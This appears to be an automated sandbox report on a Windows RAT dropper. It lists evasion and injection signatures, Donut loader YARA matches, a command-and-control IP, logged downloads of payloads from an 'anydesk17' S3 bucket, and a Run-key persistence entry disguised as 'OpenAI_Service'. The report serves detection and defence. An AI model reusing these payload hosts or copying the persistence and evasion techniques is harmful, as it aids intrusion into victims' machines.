Windows Analysis Report
nrGkqbCyKP.exe

Overview

General Information

Sample name: nrGkqbCyKP.exe
renamed because original name is a hash value
Original sample name: d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d.exe
Analysis ID: 1577407
MD5: 84101c768bfd9493c2926066e7aaa6f2
SHA1: c2d1e93e44adce0533d063014bb222a4a40d1a37
SHA256: d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d
Tags: anydesk17-s3-ap-east-1-amazonaws-comexeuser-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nrGkqbCyKP.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\nrGkqbCyKP.exe" MD5: 84101C768BFD9493C2926066E7AAA6F2)
    • zfon.exe (PID: 5260 cmdline: "C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 7064 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
        • WerFault.exe (PID: 5372 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 396 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
        • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 2212 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • hh.exe (PID: 4780 cmdline: C:\windows\hh.exe MD5: 2C8FE78D53C8CA27523A71DFD2938241)
  • explorer.exe (PID: 5664 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • zfon.exe (PID: 6104 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 1256 cmdline: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x468161:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x4d6fff:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Source | Rule | Description | Author | Strings
00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x2f02c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x2df1c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x136033:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0xf65f2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20f4b9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x2b0799:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x30c5ca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Source | Rule | Description | Author | Strings
0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0xbb1d9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x15c4b9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1b82ea:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0xd8449:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x179729:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x1d555a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0xf1ff2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x20aeb9:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x2ac199:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x307fca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
7.2.zfon.exe.7ff79cfb0000.0.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x136433:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 27.50.63.8, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\hh.exe, Initiated: true, ProcessId: 4780, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49724
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 4084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OpenAI_Service

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:06:58.025877+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.8 | 49724 | 27.50.63.8 | 4433 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T13:06:08.622312+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 52.95.160.78 | 443 | TCP
2024-12-18T13:06:22.033948+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49718 | 3.5.239.146 | 443 | TCP
2024-12-18T13:06:26.185231+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 3.5.237.170 | 443 | TCP
2024-12-18T13:06:29.550539+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49720 | 3.5.237.170 | 443 | TCP
2024-12-18T13:06:37.566996+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 52.95.162.66 | 443 | TCP
2024-12-18T13:06:41.247971+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49722 | 52.95.162.66 | 443 | TCP

AV Detection

Source: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png | Avira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png | Avira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll | Avira URL Cloud: Label: malware
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcef | ReversingLabs: Detection: 23%
Source: nrGkqbCyKP.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 83.9% probability

Compliance

Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Unpacked PE file: 7.2.zfon.exe.7ff79cfb0000.0.unpack
Source: unknown | HTTPS traffic detected: 3.5.239.146:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: nrGkqbCyKP.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.dr
Source: Binary string: D:\code\personal\soft_distribute_tags\code\CSharpInstaller16\obj\Release\monodelphous.pdb source: nrGkqbCyKP.exe
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000007.00000002.2080942034.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000016.00000002.2198134102.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000019.00000002.2198456266.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: C:\Windows\hh.exe | File opened: z:
Source: C:\Windows\hh.exe | File opened: x:
Source: C:\Windows\hh.exe | File opened: v:
Source: C:\Windows\hh.exe | File opened: t:
Source: C:\Windows\hh.exe | File opened: r:
Source: C:\Windows\hh.exe | File opened: p:
Source: C:\Windows\hh.exe | File opened: n:
Source: C:\Windows\hh.exe | File opened: l:
Source: C:\Windows\hh.exe | File opened: j:
Source: C:\Windows\hh.exe | File opened: h:
Source: C:\Windows\hh.exe | File opened: f:
Source: C:\Windows\explorer.exe | File opened: d:
Source: C:\Windows\hh.exe | File opened: b:
Source: C:\Windows\hh.exe | File opened: y:
Source: C:\Windows\hh.exe | File opened: w:
Source: C:\Windows\hh.exe | File opened: u:
Source: C:\Windows\hh.exe | File opened: s:
Source: C:\Windows\hh.exe | File opened: q:
Source: C:\Windows\hh.exe | File opened: o:
Source: C:\Windows\hh.exe | File opened: m:
Source: C:\Windows\hh.exe | File opened: k:
Source: C:\Windows\hh.exe | File opened: i:
Source: C:\Windows\hh.exe | File opened: g:
Source: C:\Windows\hh.exe | File opened: e:
Source: C:\Windows\explorer.exe | File opened: c:
Source: C:\Windows\hh.exe | File opened: [:
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Code function: 6_2_00007FFBC1B40E70 FindFirstFileExW,FindClose,wcscpy_s,6_2_00007FFBC1B40E70
Source: C:\Windows\hh.exe | Code function: 8_2_000001E47C4EF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,8_2_000001E47C4EF350
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe | Code function: 22_2_00007FFBAD260E70 FindFirstFileExW,FindClose,wcscpy_s,22_2_00007FFBAD260E70
Source: C:\Windows\hh.exe | Code function: 8_2_000001E47C4E6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370

Networking

Source: Network traffic | Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.8:49724 -> 27.50.63.8:4433
Source: global traffic | TCP traffic: 192.168.2.8:49724 -> 27.50.63.8:4433
Source: global traffic | HTTP traffic detected: GET /zfon.exe HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /libcef.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /MSVCP140.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /aut.png HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | HTTP traffic detected: GET /view.png HTTP/1.1 Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 52.95.160.78:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 3.5.239.146:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 3.5.237.170:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 3.5.237.170:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 52.95.162.66:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 52.95.162.66:443
Source: unknown | TCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\hh.exe | Code function: 8_2_000001E47C4E3B00 recv,8_2_000001E47C4E3B00
Source: global traffic | DNS traffic detected: DNS query: anydesk17.s3.ap-east-1.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anydesk17.s3.ap-east-1.amazonaws.comd
Source: nrGkqbCyKP.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: nrGkqbCyKP.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: libcef.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124360952.00000000090B2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.00000000090A7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.00000000090A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: nrGkqbCyKP.exe | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://n.ad8j
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.ad
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.ado
